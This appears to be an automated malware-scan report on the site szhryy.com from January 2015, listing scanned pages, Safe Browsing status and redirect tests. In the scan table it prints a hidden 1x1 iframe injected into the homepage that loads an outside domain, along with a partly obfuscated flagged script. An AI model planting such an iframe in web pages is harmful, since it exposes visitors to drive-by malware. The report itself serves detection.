Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=szhryy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://szhryy.com/ | 200 OK Content-Length: 140863 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 46 websites. size: 1x1 src: http://zief.pl/rc/ <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"> | ||
http://szhryy.com/templets/default/js/jquery.min.js | 200 OK Content-Length: 72328 Content-Type: application/x-javascript | clean |
http://szhryy.com/templets/default/js/jquery.sgallery.js | 200 OK Content-Length: 5384 Content-Type: application/x-javascript | clean |
http://szhryy.com/templets/default/js/search_common.js | 200 OK Content-Length: 248 Content-Type: application/x-javascript | clean |
http://szhryy.com/templets/default/js/hd.js | 200 OK Content-Length: 2854 Content-Type: application/x-javascript | clean |
http://szhryy.com/templets/default/js/hdp.js | 200 OK Content-Length: 112 Content-Type: application/x-javascript | clean |
http://szhryy.com/templets/default/js/jquery.imageScroller.js | 200 OK Content-Length: 2633 Content-Type: application/x-javascript | clean |
http://prt.zoosnet.net/JS/LsJS.aspx?siteid=PRT32129074&float=1&lng=cn | 200 OK Content-Length: 7413 Content-Type: text/javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.szhryy.com if(typeof(LR_showfloat)=='undefined' || LR_showfloat!=1)var LR_showfloat = 1;var LR_MCount=0;var LR_sysurl = 'http://prt.zoosnet.net/';var LR_lng = 'cn';var LR_isMobile = 0;var LR_77834='44C67D288AC14D6987EA22431EB444E3';var LR_websiteid = 'PRT32129074';var LR_a6589=LR_77834.replace(/4/g,'8').replace(/5/g,'3');LR_a6589=LR_a6589.replace(/A/g,'B').replace(/C/g,'D').replace(/E/g,'F').replace(/G/g,'H').replace(/I/g,'J').replace(/K/g,'L');var LR_sysurl1 = ' ...[3665 bytes skipped]... Decoded script: LR_repeatinvite=0; LR_repeatinvite=0; /*** called setInterval with LR_repeatinvite=0;, 20 */ if(typeof(LR_nextshowmini_s)!='undefined')LR_nextshowmini_s='lr'; if(typeof(LR_nextshowmini_s)!='undefined')LR_nextshowmini_s='lr'; /*** called setInterval with if(typeof(LR_nextshowmini_s)!='undefined')LR_nextshowmini_s='lr';, 20 */ | ||
http://szhryy.com/templets/default/js/gd.js | 200 OK Content-Length: 1947 Content-Type: application/x-javascript | clean |
http://szhryy.com/a/pinpaifuke/ | 200 OK Content-Length: 25165 Content-Type: text/html | clean |
http://szhryy.com/a/wutongrenliu/ | 200 OK Content-Length: 21353 Content-Type: text/html | clean |
http://szhryy.com/a/fukeweichuang/ | 200 OK Content-Length: 22425 Content-Type: text/html | clean |
http://szhryy.com/a/zhuanyenanke/ | 200 OK Content-Length: 21327 Content-Type: text/html | clean |
http://szhryy.com/a/shengzhiganran/ | 200 OK Content-Length: 20277 Content-Type: text/html | clean |
http://szhryy.com/a/xianjinjishu/ | 200 OK Content-Length: 21542 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: szhryy.com
Result:
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 03:14:23 GMT
Accept-Ranges: bytes
ETag: "3b0302b192bd01:0"
Server: Microsoft-IIS/7.5
Content-Length: 140863
Content-Type: text/html
Last-Modified: Thu, 08 Jan 2015 08:00:29 GMT
X-Powered-By: ASP.NET
...140863 bytes of data.
GET / HTTP/1.1
Host: szhryy.com
Result:
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 03:14:23 GMT
Accept-Ranges: bytes
ETag: "3b0302b192bd01:0"
Server: Microsoft-IIS/7.5
Content-Length: 140863
Content-Type: text/html
Last-Modified: Thu, 08 Jan 2015 08:00:29 GMT
X-Powered-By: ASP.NET
...140863 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: szhryy.com
Referer: http://www.google.com/search?q=szhryy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: szhryy.com
Referer: http://www.google.com/search?q=szhryy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.